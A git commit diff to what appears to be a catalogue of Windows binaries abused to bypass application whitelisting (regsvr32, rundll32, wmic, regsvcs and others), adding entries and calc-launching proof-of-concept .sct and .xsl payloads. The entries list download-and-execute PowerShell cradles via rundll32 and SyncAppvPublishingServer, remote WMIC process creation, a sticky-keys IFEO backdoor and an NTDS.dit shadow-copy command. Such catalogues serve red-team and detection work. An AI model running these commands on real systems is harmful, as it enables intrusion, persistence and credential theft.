Added some more adjustments

master
api0cradle 2018-04-18 23:45:36 +02:00
parent 1a0eb4edc7
commit 610e5d7607
12 changed files with 216 additions and 21 deletions

View File

@ -11,8 +11,8 @@ Acknowledgements:
Code sample:
* [AllTheThingsX64.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)
* [AllTheThingsX32.dll - Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)
* [AllTheThingsX64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsX32.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx32.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
@ -31,7 +31,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team

View File

@ -10,7 +10,7 @@ Acknowledgements:
* ?
Code sample:
* [NameOfLink](Payload/NameOfPayload)
*
Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/

View File

@ -0,0 +1,23 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

View File

@ -0,0 +1,11 @@
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>

View File

@ -3,14 +3,15 @@
* Functions: Execute
```
regasm.exe /U AllTheThings.dll
regasm.exe /U AllTheThingsx64.dll
```
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/

View File

@ -3,10 +3,29 @@
* Functions: Execute
```
regsvcs.exe /U regsvcs.dll
regsvcs.exe regsvcs.dll
regsvcs.exe AllTheThingsx64.dll
```
Acknowledgements:
* Casey Smith - @subtee
* Casey Smith - @subtee
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team

View File

@ -3,11 +3,33 @@
* Functions: Execute
```
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
regsvr32.exe /s /u /i:file.sct scrobj.dll
```
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [Regsvr32_calc.sct](Payload/Regsvr32_calc.sct)[1]
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
Full path:
```
C:\Windows\System32\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team

View File

@ -3,6 +3,8 @@
* Functions: Execute
```
rundll32.exe AllTheThingsx64,EntryPoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
@ -37,6 +39,27 @@ Acknowledgements:
* Jimmy - @bohops
* Moriarty - @Moriarty_Meng
* Adam - @hexacorn
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
* [AllTheThingsx86.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx86.dll)[1]
Resources:
* https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Full path:
```
C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe
```
Notes:
[1]Code sample linked to Red Canary - Atomic Red Team

View File

@ -9,4 +9,22 @@ runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.tx
Acknowledgements:
* Matt Graeber - @mattifestation
Code sample:
*
Resources:
* https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
Full path:
```
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
```
Notes:

View File

@ -8,3 +8,21 @@ SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http
Acknowledgements:
* Nick Landers - @monoxgas
Code sample:
*
Resources:
* https://twitter.com/monoxgas/status/895045566090010624
Full path:
```
C:\Windows\System32\SyncAppvPublishingServer.exe
```
Notes:
Command injection into PowerShell
Might have been fixed in newest version of Windows 10.

View File

@ -1,16 +1,56 @@
## WMIC.exe
* Functions: Execute
* Functions: Reconnaissance, Execute, Read ADS
```
wmic process call create calc
wmic process call create calc
wmic process get brief /format:"https://www.example.com/file.xsl
wmic os get /format:"MYXSLFILE.xsl"
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
wmic process call create '"c:\ads\file.txt:program.exe"'
wmic useraccount get /ALL
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
get-wmiobject class "win32_share" namespace "root\CIMV2" computer "targetname"
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
wmic /NODE: "192.168.0.1" process call create "evil.exe"
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
wmic process get brief /format:"https://www.example.com/file.xsl"
wmic os get /format:"MYXSLFILE.xsl"
wmic process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
```
Acknowledgements:
* Casey Smith - @subtee
Code sample:
* [Wmic_calc.xsl](Payloads/Wmic_calc.xls)
Resources:
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
* https://twitter.com/subTee/status/986234811944648707
Full path:
```
c:\windows\system32\wbem\wmic.exe
c:\windows\sysWOW64\wbem\wmic.exe
```
Notes:

View File

@ -3,8 +3,28 @@
* Functions: DLL hijack
```
xwizard.exe (xwizard.dll in same folder)
xwizard.exe
```
Acknowledgements:
* Adam - @Hexacorn
* Adam - @Hexacorn
Code sample:
*
Resources:
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
Full path:
```
c:\windows\system32\xwizard.exe
c:\windows\sysWOW32\xwizard.exe
```
Notes:
Need to copy out xwizard.exe to a user controlled folder.
If you add your own version of xwizard.dll it will execute when you start xwizard.exe.